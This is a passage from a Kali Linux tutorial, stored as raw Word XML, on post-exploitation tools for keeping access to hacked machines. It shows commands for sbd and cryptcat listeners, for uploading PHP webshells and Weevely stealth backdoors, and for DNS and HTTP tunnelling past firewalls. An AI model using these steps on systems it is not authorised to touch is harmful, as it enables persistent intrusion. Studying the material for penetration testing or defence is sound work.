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we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will see the tools that Kali uses to maintain connection and for access to a hacked machine even when it connects and disconnects again.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115841" w:rsidRPr="00115841" w:rsidRDefault="00115841" w:rsidP="00115841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r w:rsidRPr="00115841">
        <w:rPr>
          <w:rFonts w:ascii="var(--ff-lato)" w:eastAsia="Times New Roman" w:hAnsi="var(--ff-lato)" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Powersploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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This </w:t>
      </w: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is a tool that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for Windows machines. It has PowerShell installed in </w:t>
      </w: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victims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machine. This tool helps the hacker to connect with the victim’s machine via PowerShell.</w:t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To open it, open the terminal on the left and type the following command to enter into the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powersploit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folder −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cd</w:t>
      </w:r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/</w:t>
      </w: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usr</w:t>
      </w:r>
      <w:proofErr w:type="spell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/share/</w:t>
      </w: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powersploit</w:t>
      </w:r>
      <w:proofErr w:type="spell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/ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115841" w:rsidRPr="00115841" w:rsidRDefault="00115841" w:rsidP="00115841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If you type </w:t>
      </w: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gram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ls”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 it will list all the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powersploit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tools that you can download and install in the victim’s machine after you have gained access. Most of them are name self-explained according to their names.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809625"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="16" name="Picture 16" descr="Powersplo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splo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An easy way to download this tool on the victim’s machine is to create a web server, which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powersploit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tools allow to create easily using the following command −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python</w:t>
      </w:r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-m </w:t>
      </w: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SimpleHTTPServer</w:t>
      </w:r>
      <w:proofErr w:type="spell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428625"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="15" name="Picture 15" descr="Download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To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After this, if you type: http://&lt;Kali machine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ip_address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&gt;:8000/ following is the result.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67150" cy="3209925"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="14" name="Picture 14" descr="Directory Lis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ory List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r w:rsidRPr="00115841">
        <w:rPr>
          <w:rFonts w:ascii="var(--ff-lato)" w:eastAsia="Times New Roman" w:hAnsi="var(--ff-lato)" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Sbd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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sbd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 tool similar to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Netcat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. It is portable and </w:t>
      </w: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can be used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in Linux and Microsoft machines. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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sbd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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features AES-CBC-128 + HMAC-SHA1 encryption&gt; Basically, it helps to connect to a victim’s machine any time on a specific port and send commands remotely.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115841" w:rsidRPr="00115841" w:rsidRDefault="00115841" w:rsidP="00115841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To open it, go to the terminal and type </w:t>
      </w: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sbd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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-l -p port”</w:t>
      </w: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 for the server to accept connections.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048000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13" name="Picture 13" descr="Connection Ac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nection Acce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In this case, let us put port 44 where the server will listen.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552450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12" name="Picture 12" descr="Case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e P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On the victim’s site, type </w:t>
      </w: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sbd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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IPofserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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port”</w:t>
      </w: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. A connection will be established where we can send the remote commands.</w:t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In this case, it is “localhost” since we have performed the test on the same machine.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5675" cy="381000"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="11" name="Picture 11" descr="Ipof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of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Finally, on the server you will see that a connection has occurred as shown in the following screenshot.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571500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10" name="Picture 10" descr="Server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er Conne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r w:rsidRPr="00115841">
        <w:rPr>
          <w:rFonts w:ascii="var(--ff-lato)" w:eastAsia="Times New Roman" w:hAnsi="var(--ff-lato)" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Webshells</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Webshells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can be used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to maintain access or to hack a website. </w:t>
      </w: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But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most of them are detected by antiviruses. The C99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php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shell </w:t>
      </w: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is very well known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among the antivirus. Any common antivirus will easily detect it as a malware.</w:t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Generally, their main function is to send system command via web interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115841" w:rsidRPr="00115841" w:rsidRDefault="00115841" w:rsidP="00115841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To open it, and type </w:t>
      </w:r>
      <w:r w:rsidRPr="00115841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</w:rPr>
        <w:t>“cd /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00115841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</w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00115841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</w:rPr>
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00115841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</w:rPr>
        <w:t>webshells</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00115841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</w:rPr>
        <w:t>/”</w:t>
      </w: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 in the terminal.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561975"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="9" name="Picture 9" descr="Web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she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As you see, they are divided in classes according to the programing </w:t>
      </w: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language :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asp ,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aspx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, cfm,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jsp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,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perl,php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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If you enter in the PHP folder, you can see all the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webshells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for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php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webpages.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714375"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="8" name="Picture 8" descr="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ld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To upload the shell to a web server, for example </w:t>
      </w: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“simple-</w:t>
      </w:r>
      <w:proofErr w:type="spell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backdoor.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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”</w:t>
      </w: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 open the webpage and URL of the web shell.</w:t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At the end, write the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cmd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command. You will have all the info shown as in the following screenshot.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714500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="Picture 7" descr="Writ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rite Comma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r w:rsidRPr="00115841">
        <w:rPr>
          <w:rFonts w:ascii="var(--ff-lato)" w:eastAsia="Times New Roman" w:hAnsi="var(--ff-lato)" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Weevely</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Weevely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 PHP web shell that simulate telnet-like connection. It is a tool for web application post exploitation, and can be used as a stealth backdoor or as a web shell to manage legit web accounts, even </w:t>
      </w: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free hosted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ones.</w:t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To open it, go to the terminal and type “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weevely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” where you can see its usage.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409825"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="6" name="Picture 6" descr="Weeve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eve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To generate the shell, type </w:t>
      </w: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weevely</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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generate password </w:t>
      </w:r>
      <w:proofErr w:type="spell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pathoffile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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”</w:t>
      </w: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. As seen in the following screenshot, it </w:t>
      </w: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is generated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on the “Desktop” folder and the file is to upload in a webserver to gain access.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048000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="Picture 5" descr="Generate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nerate She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 xml:space="preserve">After uploading the web shell as shown in the following screenshot, we can connect with </w:t>
      </w:r>
      <w:proofErr w:type="spell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cmd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to the server using the command </w:t>
      </w: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weevely</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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URL password”</w:t>
      </w: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 where you can see that a session has started.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209925"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="4" name="Picture 4" descr="Uploading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ploading Fi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gramStart"/>
      <w:r w:rsidRPr="00115841">
        <w:rPr>
          <w:rFonts w:ascii="var(--ff-lato)" w:eastAsia="Times New Roman" w:hAnsi="var(--ff-lato)" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>http-tunnel</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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http-tunnel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creates a bidirectional virtual data stream tunneled in HTTP requests. The requests </w:t>
      </w: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can be sent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via a HTTP proxy if so desired. This can be useful for users behind restrictive firewalls. If WWW access is allowed through a HTTP proxy, </w:t>
      </w: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it’s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possible to use http-tunnel and telnet or PPP to connect to a computer outside the firewall.</w:t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First, we should create a tunnel server with the following command −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httptunnel_server</w:t>
      </w:r>
      <w:proofErr w:type="spell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–h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115841" w:rsidRPr="00115841" w:rsidRDefault="00115841" w:rsidP="00115841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Then, on the client site type </w:t>
      </w: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httptunnel_client</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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–h”</w:t>
      </w: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 and both will start to accept connections.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115841" w:rsidRPr="00115841" w:rsidRDefault="00115841" w:rsidP="00115841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115841">
        <w:rPr>
          <w:rFonts w:ascii="var(--ff-lato)" w:eastAsia="Times New Roman" w:hAnsi="var(--ff-lato)" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>dns2tcp</w:t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This is again a tunneling tool that helps to pass the TCP traffic through DNS Traffic, which means UDP 53 port.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00115841" w:rsidRPr="00115841" w:rsidRDefault="00115841" w:rsidP="00115841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To start it, type </w:t>
      </w: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“dns2tcpd”</w:t>
      </w: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. The usage is explained when you will open the script.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533400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="Picture 3" descr="DNS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NSTc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On the server site, enter this command to configure the file.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#cat &gt;&gt;.dns2tcpdrc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&lt;&amp;</w:t>
      </w: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l</w:t>
      </w:r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;END</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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listen = 0.0.0.0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port</w:t>
      </w:r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= 53 user=nobody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spellStart"/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chroot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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= /root/dns2tcp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pid_file</w:t>
      </w:r>
      <w:proofErr w:type="spell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= /</w:t>
      </w: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var</w:t>
      </w:r>
      <w:proofErr w:type="spell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/run/dns2tcp.pid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domain</w:t>
      </w:r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= your domain key = </w:t>
      </w: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secretkey</w:t>
      </w:r>
      <w:proofErr w:type="spell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resources</w:t>
      </w:r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= ssh:127.0.0.1:22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END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#dns2tcpd -f .dns2tcpdrc</w:t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On Client site, enter this command.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# </w:t>
      </w:r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cat</w:t>
      </w:r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&gt;&gt;.dns2tcprc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&lt;&lt;END domain = your domain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resource</w:t>
      </w:r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= </w:t>
      </w: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ssh</w:t>
      </w:r>
      <w:proofErr w:type="spell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local_port</w:t>
      </w:r>
      <w:proofErr w:type="spell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= 7891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key</w:t>
      </w:r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= </w:t>
      </w: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secretkey</w:t>
      </w:r>
      <w:proofErr w:type="spell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END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# dns2tcpc -f .dns2tcprc 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# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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  <w:proofErr w:type="spell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root@localhost</w:t>
      </w:r>
      <w:proofErr w:type="spell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-p 7891 -D 7076 </w:t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Tunneling will start with this command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115841" w:rsidRPr="00115841" w:rsidRDefault="00115841" w:rsidP="00115841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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00115841">
        <w:rPr>
          <w:rFonts w:ascii="var(--ff-lato)" w:eastAsia="Times New Roman" w:hAnsi="var(--ff-lato)" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>cryptcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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It is another tool like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart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Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spell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which</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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 xml:space="preserve"> allows to make TCP and UDP connection with a victim’s machine in an encrypted way.</w:t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To start a server to listen for a connection, type the following command −</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115841" w:rsidRPr="00115841" w:rsidRDefault="00115841" w:rsidP="0011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spellStart"/>
      <w:proofErr w:type="gramStart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>cryptcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00115841">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve"> –l –p port –n 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971550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Picture 2" descr="crypt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yptca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1" w:rsidRPr="00115841" w:rsidRDefault="00115841" w:rsidP="0011584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Where,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115841" w:rsidRPr="00115841" w:rsidRDefault="00115841" w:rsidP="0011584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-l</w:t>
      </w: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 stands for listening to a connection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115841" w:rsidRPr="00115841" w:rsidRDefault="00115841" w:rsidP="0011584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-p</w:t>
      </w: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 stands for port number parameter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115841" w:rsidRPr="00115841" w:rsidRDefault="00115841" w:rsidP="0011584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-n</w:t>
      </w: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 stands for not doing the name resolution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115841" w:rsidRPr="00115841" w:rsidRDefault="00115841" w:rsidP="00115841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15841">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>On client site, the connection command is </w:t>
      </w:r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cryptcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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IPofServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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PortofServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0011584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”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115841" w:rsidRPr="00115841" w:rsidRDefault="00115841" w:rsidP="00115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914400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Picture 1" descr="Port of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ort of Serv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6" w:rsidRDefault="00451ED6">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00451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C12"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9246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41"/>
    <w:rsid w:val="00115841"/>
    <w:rsid w:val="00451ED6"/>
    <w:rsid w:val="006D7F62"/>
    <w:rsid w:val="007D0DCC"/>
    <w:rsid w:val="00D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0A148-67FD-40C3-AE99-569102C1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8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5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8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1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-25T17:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-25T17:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>